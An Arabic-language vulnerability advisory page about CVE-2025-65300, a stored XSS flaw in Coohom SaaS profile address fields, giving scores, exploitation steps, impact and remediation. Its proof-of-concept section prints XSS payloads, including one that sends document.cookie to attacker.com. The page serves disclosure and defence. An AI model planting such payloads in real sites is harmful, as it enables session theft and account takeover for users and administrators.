CVE-2025-65300
توجد ثغرة برمجة نصية عبر المواقع (Cross-Site Scripting - XSS) من نوع التخزين (Stored) في منصة Coohom السحابية (SaaS) بإصدار feVersion=1760060603897...
- تم النشر
- 09/12/2025
- محدث
- 11/12/2025
- تخصيص CNA
- mitre
- الأدلة المرصودة
- 08/08/2026
CVSS الأساسي
nvd · CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:Nمنخفض · الثلاثين يومًا القادمة
- المئوية
- 10.0%
- تاريخ الموديل
- 21/09/2026
EPSS هو تقدير إحصائي، وليس يقينًا أو مقياسًا للتأثير. ادمجها مع CVSS وحالة KEV والتعرض وبيئتك.
ملخص
توجد ثغرة برمجة نصية عبر المواقع (Cross-Site Scripting - XSS) من نوع التخزين (Stored) في منصة Coohom السحابية (SaaS) بإصدار feVersion=1760060603897 (2025-10-28) في وحدة إعدادات الحساب (Account Settings Module)، حيث يتم إعادة عرض مدخلات المستخدم غير المنقّاة في حقول العنوان (City، State، Country/Region) على الصفحة. يمكن للمهاجمين حقن كود JavaScript عشوائي، ويتم تنفيذ هذا الكود عند عرض صفحة الملف الشخصي المتأثرة. وقد يؤدي ذلك إلى اختطاف الجلسة، أو سرقة ملفات تعريف الارتباط (cookies)، أو تنفيذ نصوص برمجية عشوائية في متصفح الضحية.
المصادر
1# توثيق CVE-2025-65300: ثغرة برمجة نصية عبر المواقع (XSS) مخزنة في منصة Coohom SaaS ## نظرة عامة CVE-2025-65300 هي ثغرة **برمجة نصية عبر المواقع (XSS) مخزنة** تم اكتشافها في حقول عنوان الملف الشخصي ضمن إعدادات الحساب في منصة **Coohom SaaS**. تسمح هذه الثغرة للمهاجم بحقن نصوص برمجية خبيثة يتم تخزينها بشكل دائم على الخادم وتنفيذها في متصفح أي مستخدم يعرض الصفحة المتأثرة. ## التفاصيل الفنية - **المكوّن المتأثر**: إعدادات الحساب — حقول عنوان الملف الشخصي - **نوع الثغرة**: Cross-Site Scripting (XSS) مخزنة - **التصنيف**: CWE-79 (عدم التعقيم السليم للمخرجات) - **خطورة الثغرة**: متوسطة إلى عالية ## سيناريو الاستغلال (PoC) يمكن للمهاجم استغلال هذه الثغرة عبر الخطوات التالية: 1. تسجيل الدخول إلى حساب على منصة Coohom. 2. الانتقال إلى إعدادات الحساب ثم قسم العنوان في الملف الشخصي. 3. حقن حمولة خبيثة في أحد حقول العنوان، مثل: ```html <script>alert(document.cookie)</script> ``` أو حمولة أكثر تقدماً لسرقة الجلسات: ```html <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> ``` 4. حفظ التغييرات — يتم تخزين الحمولة في قاعدة البيانات دون تعقيم مناسب. 5. عند قيام أي مستخدم آخر (بما في ذلك المسؤولين) بعرض صفحة الملف الشخصي للحساب المخترق، يتم تنفيذ الحمولة في متصفحه. ## تحليل الأثر - **سرقة الجلسات**: يمكن للمهاجم سرقة ملفات تعريف الارتباط (cookies) الخاصة بالجلسات والاستيلاء على حسابات المستخدمين. - **اختطاف الحساب**: إمكانية تنفيذ إجراءات نيابة عن الضحية مثل تغيير كلمة المرور أو البريد الإلكتروني. - **انتشار البرمجيات الخبيثة**: إعادة توجيه المستخدمين إلى مواقع ضارة أو تنزيل برمجيات خبيثة. - **التأثير على المسؤولين**: إذا قام مسؤول بعرض الصفحة المتأثرة، يمكن للمهاجم تنفيذ إجراءات إدارية أو الوصول إلى بيانات حساسة. - **الاستمرارية**: نظراً لأن الحمولة مخزنة بشكل دائم، يستمر الأثر حتى يتم اكتشاف الحمولة وإزالتها يدوياً. ## التوصيات العلاجية ### للإصلاح الفوري 1. **تعقيم المدخلات**: تطبيق تعقيم صارم على جميع حقول الإدخال، خاصة حقول العنوان، لتصفية أي وسوم HTML أو نصوص برمجية. 2. **ترميز المخرجات**: استخدام ترميز السياق المناسب (مثل HTML entity encoding) عند عرض بيانات المستخدم في الصفحات. 3. **سياسة أمان المحتوى (CSP)**: تفعيل سياسة أمان المحتوى لمنع تنفيذ النصوص البرمجية غير المصرح بها. 4. **تحديث المنصة**: التحقق من توفر تحديثات أمنية من Coohom وتطبيقها فوراً. ### للإصلاح طويل الأمد 1. **مراجعة أمنية شاملة**: إجراء فحص أمني كامل لجميع نقاط الإدخال في المنصة. 2. **اختبار الاختراق الدوري**: تنفيذ اختبارات اختراق منتظمة لاكتشاف ثغرات مشابهة. 3. **تدريب المطورين**: رفع الوعي حول ممارسات البرمجة الآمنة والوقاية من XSS. 4. **آلية الإبلاغ عن الثغرات**: إنشاء برنامج مكافآت للثغرات (Bug Bounty) لتشجيع الباحثين الأمنيين على الإبلاغ المسؤول. ## المراجع - [CVE-2025-65300 على NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-65300) - [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
الاستخدام المسؤول
استخدم معلومات الثغرات الأمنية فقط على الأنظمة التي تمتلكها أو المرخص لها باختبارها. يرتبط Kitploit ببيانات تعريف البحث العامة ولا يخزن أكواد الاستغلال أو الحمولات الضارة.